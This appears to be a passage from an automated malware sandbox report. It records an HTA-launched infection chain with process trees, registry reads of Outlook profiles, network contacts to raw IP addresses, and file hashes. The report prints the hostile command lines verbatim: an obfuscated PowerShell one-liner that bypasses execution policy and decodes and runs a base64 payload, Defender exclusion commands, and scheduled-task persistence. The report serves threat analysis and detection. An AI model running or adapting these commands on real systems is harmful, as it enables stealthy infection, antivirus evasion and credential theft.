| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0.hta"
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'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'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 511c43e75c660df11a98089d2e722ac8 |
| SHA1 | 29b4b67e219af20e607ed6eb4fb23e734bf31aeb |
| SHA256 | 9048bc13b8c28e44128a61ff7c76415f52420853bf01dbebaf501eb03ee584b0 |
| SHA512 | e93c17a8fd030615db054a4478337cab201779735bcfb2639c8ed723c16b3728e001811a1a236357391e497d3a349e9d9a05278c28816be28d57be8df959f977 |
\??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.cmdline
| MD5 | 3e99a2c1b3a3cfdd8870f044bbe0ae07 |
| SHA1 | f57021d4745ce760b37e2806ca6ebc9dbe9d47fd |
| SHA256 | 740a640a03f70647d38fe6fd169a9c4371ad82cfc206d12665515f1db7a08ec3 |
| SHA512 | 306642a7c023135a30eb2b2ced06aaf7dbebf2ffd0f3a02195ab1298c54cbbbfbab003f96fa265aa4b8472a0b1876fe6aab94620ce13935bf02ed4b3cb983643 |
\??\c:\Users\Admin\AppData\Local\Temp\hs07zwtj.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\CSCF75A.tmp
| MD5 | 08231841e49d0ff1e44000a2138277d4 |
| SHA1 | 7b33e37d162578c4da5f4bff81e299bf58158b95 |
| SHA256 | 4cd2cb49122215ee415c3d7272d2bb48f2d2415638bc063dbec22f12d1412fb8 |
| SHA512 | 8996d94dae69d179c83e874d9453c95bc9ccd637ce5a8a4de64ccc5117c3bc5179805949a6d348c3ecc4afb6a4e76abfce3ee69dddfe281aec9e882dadd243c8 |
C:\Users\Admin\AppData\Local\Temp\RESF75B.tmp
| MD5 | 1629b742fe9bb12ee231b3cf19c56c75 |
| SHA1 | eea0867318da1607efac26814417f02f4143e373 |
| SHA256 | 0e8b76d9c7446dd4b7612c1ef4c42697508915df84119deb8ebf7db29843796e |
| SHA512 | badd29397ad0aa758138b7b2c2419aa607b51adcd9b8a04f7ed20cafbe268550065a4337b3a7c7773f105988eac88585f4f7a218a9ce98cf36b13bfb308995c7 |
C:\Users\Admin\AppData\Local\Temp\hs07zwtj.dll
| MD5 | b45173682a7449f2b958017b4acec059 |
| SHA1 | 900a06b161ba8675f40b698b0d2cfe6120b169c6 |
| SHA256 | f0b2b5ee2383e6470967e412b5a6000c3e7d2ad6e700513cebbc07719e2c1a6e |
| SHA512 | 1105b44b3820178fb46fa265e5ff401ac53f3e979e3cd5f6a2c2c29f426325fd6faf16ada178f0e9becfef8c7e3cbbd3dffd68adcaf63ec5609b0c7d1da157a2 |
C:\Users\Admin\AppData\Local\Temp\hs07zwtj.pdb
| MD5 | 9e16775089f02993bcd37f5ecfc46785 |
| SHA1 | 1116e44a47e0adc235d054081386bb617933d42b |
| SHA256 | ea8bf6580c01da53bc451ffa25fced942fbe68f3ed2e70341f0066c06ee965fb |
| SHA512 | 9655eb77c2057471f80a538385887929bdbbf23868e6a9d316da60d7e104e6a793578c3ffc46d66604fdd21fa1030a3d34276c4011781b549d6048326821712a |
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/2640-35-0x0000000001350000-0x00000000013E8000-memory.dmp
memory/2640-36-0x0000000000390000-0x00000000003A2000-memory.dmp
memory/2640-37-0x0000000004BC0000-0x0000000004C24000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\tmp6E2E.tmp
| MD5 | 1b67e8cceed149b21087e5f364860141 |
| SHA1 | 38836c472a49a5b993bf43b87b8c345961e3a0d9 |
| SHA256 | 5d0543738b465abe90478a6ceeacff369ccd6b9edfcd686f1f75a9f3adc9784c |
| SHA512 | 791c32dd134067ebc489032b0a87abb901790bd2218596f39bc2c9bd520ef0cc549956da3d06f6f2c55679321ed41289005aade54a7ccab85030f9c41b3daa7c |
memory/2244-54-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-67-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-65-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2244-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-60-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-58-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-56-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000\0f5007522459c86e95ffcc62f32308f1_1defa0c0-fc04-4155-83bc-b490dbaa3679
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
memory/2244-86-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2244-95-0x0000000000400000-0x00000000004A2000-memory.dmp